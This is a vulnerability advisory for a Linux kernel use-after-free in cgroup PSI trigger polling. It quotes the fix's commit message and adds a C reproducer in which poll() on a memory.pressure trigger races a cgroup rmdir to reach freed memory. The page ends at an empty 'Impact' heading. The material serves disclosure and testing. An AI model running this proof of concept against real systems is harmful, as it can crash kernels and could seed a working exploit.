CVE-2023-54019

Severity CVSS v4.0:
Pending analysis
Type:
Unavailable / Other
Publication date:
24/12/2025
Last modified:
29/12/2025

Description

In the Linux kernel, the following vulnerability has been resolved:

sched/psi: use kernfs polling functions for PSI trigger polling

Destroying psi trigger in cgroup_file_release causes UAF issues when
a cgroup is removed from under a polling process. This is happening
because cgroup removal causes a call to cgroup_file_release while the
actual file is still alive. Destroying the trigger at this point would
also destroy its waitqueue head and if there is still a polling process
on that file accessing the waitqueue, it will step on the freed pointer:

do_select
  vfs_poll
                                  do_rmdir
                                    cgroup_rmdir
                                      kernfs_drain_open_files
                                        cgroup_file_release
                                          cgroup_pressure_release
                                            psi_trigger_destroy
                                              wake_up_pollfree(&t->event_wait)
  // vfs_poll is unblocked
                                              synchronize_rcu
                                              kfree(t)
  poll_freewait -> UAF access to the trigger's waitqueue head

Patch [1] fixed this issue for epoll() case using wake_up_pollfree(),
however the same issue exists for synchronous poll() case.
The root cause of this issue is that the lifecycles of the psi trigger's
waitqueue and of the file associated with the trigger are different. Fix
this by using kernfs_generic_poll function when polling on cgroup-specific
psi triggers. It internally uses kernfs_open_node->poll waitqueue head
with its lifecycle tied to the file's lifecycle. This also renders the
fix in [1] obsolete, so revert it.

[1] commit c2dbe32d5db5 ("sched/psi: Fix use-after-free in ep_remove_wait_queue()")
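The race in the call chain above can be exercised from user space with two tasks: one blocked in the synchronous poll() path on a cgroup PSI trigger file, and one that removes the cgroup while that file is still open. The program below is an added reproducer sketch, not the kernel's own test code. It assumes cgroup v2 mounted at /sys/fs/cgroup, root privileges, and a cgroup named psi-poll-test created for the test; the trigger-string and path limits mirror the ones documented in Documentation/accounting/psi.rst. On a kernel without the fix the polling child reaches poll_freewait() against the freed trigger's waitqueue head (visible under KASAN); on a fixed kernel the poll returns normally.

```c
/*
 * Added reproducer sketch for the poll()-vs-rmdir race described in the
 * commit message. Not kernel code. Assumes cgroup v2 at /sys/fs/cgroup,
 * root privileges, and a hypothetical test cgroup name (psi-poll-test).
 */
#include <errno.h>
#include <fcntl.h>
#include <poll.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

#define CGROUP_ROOT "/sys/fs/cgroup"  /* assumption: cgroup v2 mount point */
#define TEST_CGROUP "psi-poll-test"   /* hypothetical cgroup name for the test */
#define WINDOW_MIN_US 500000U         /* window limits documented in psi.rst */
#define WINDOW_MAX_US 10000000U

/* Build the "<some|full> <threshold_us> <window_us>" trigger string that the
 * kernel parses from a write to a pressure file. Returns the length written,
 * or -1 if the kernel would reject the parameters: unknown keyword, window
 * outside 500ms..10s, or a threshold of zero or larger than the window. */
int build_trigger(char *buf, size_t n, const char *kind,
                  unsigned threshold_us, unsigned window_us)
{
    if (strcmp(kind, "some") != 0 && strcmp(kind, "full") != 0)
        return -1;
    if (window_us < WINDOW_MIN_US || window_us > WINDOW_MAX_US)
        return -1;
    if (threshold_us == 0 || threshold_us > window_us)
        return -1;
    int len = snprintf(buf, n, "%s %u %u", kind, threshold_us, window_us);
    return (len < 0 || (size_t)len >= n) ? -1 : len;
}

/* Path of a cgroup's pressure file for a resource ("cpu", "memory" or "io"). */
int pressure_path(char *buf, size_t n, const char *cgroup, const char *resource)
{
    int len = snprintf(buf, n, CGROUP_ROOT "/%s/%s.pressure", cgroup, resource);
    return (len < 0 || (size_t)len >= n) ? -1 : len;
}

int main(void)
{
    char dir[256], path[256], trig[64];

    snprintf(dir, sizeof dir, CGROUP_ROOT "/%s", TEST_CGROUP);
    if (pressure_path(path, sizeof path, TEST_CGROUP, "memory") < 0 ||
        build_trigger(trig, sizeof trig, "some", 150000, 1000000) < 0)
        return 1;

    if (mkdir(dir, 0755) < 0 && errno != EEXIST) { perror("mkdir"); return 1; }

    /* Registering the trigger: the psi_trigger object is tied to this open
     * file and is destroyed from cgroup_file_release when the cgroup goes. */
    int fd = open(path, O_RDWR | O_NONBLOCK);
    if (fd < 0) { perror("open"); return 1; }
    if (write(fd, trig, strlen(trig)) < 0) { perror("write trigger"); return 1; }

    pid_t pid = fork();
    if (pid < 0) { perror("fork"); return 1; }
    if (pid == 0) {
        /* Poller: the synchronous poll() path (do_select -> vfs_poll) that
         * patch [1] did not cover. PSI triggers signal POLLPRI. */
        struct pollfd pfd = { .fd = fd, .events = POLLPRI };
        int r = poll(&pfd, 1, 5000);
        printf("poll() returned %d, revents=0x%x\n", r, pfd.revents);
        _exit(0);
    }

    /* Remover: do_rmdir -> cgroup_rmdir -> kernfs_drain_open_files ->
     * cgroup_file_release -> psi_trigger_destroy while the child still
     * polls the (still open) file. */
    sleep(1);
    if (rmdir(dir) < 0) perror("rmdir");
    waitpid(pid, NULL, 0);
    close(fd);
    return 0;
}
```

Build with a plain `cc` and run as root; a kernel built with KASAN reports the freed waitqueue access in poll_freewait on affected versions. The fork keeps the file description shared, so the parent's rmdir hits exactly the "cgroup_file_release while the actual file is still alive" condition from the description.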

Impact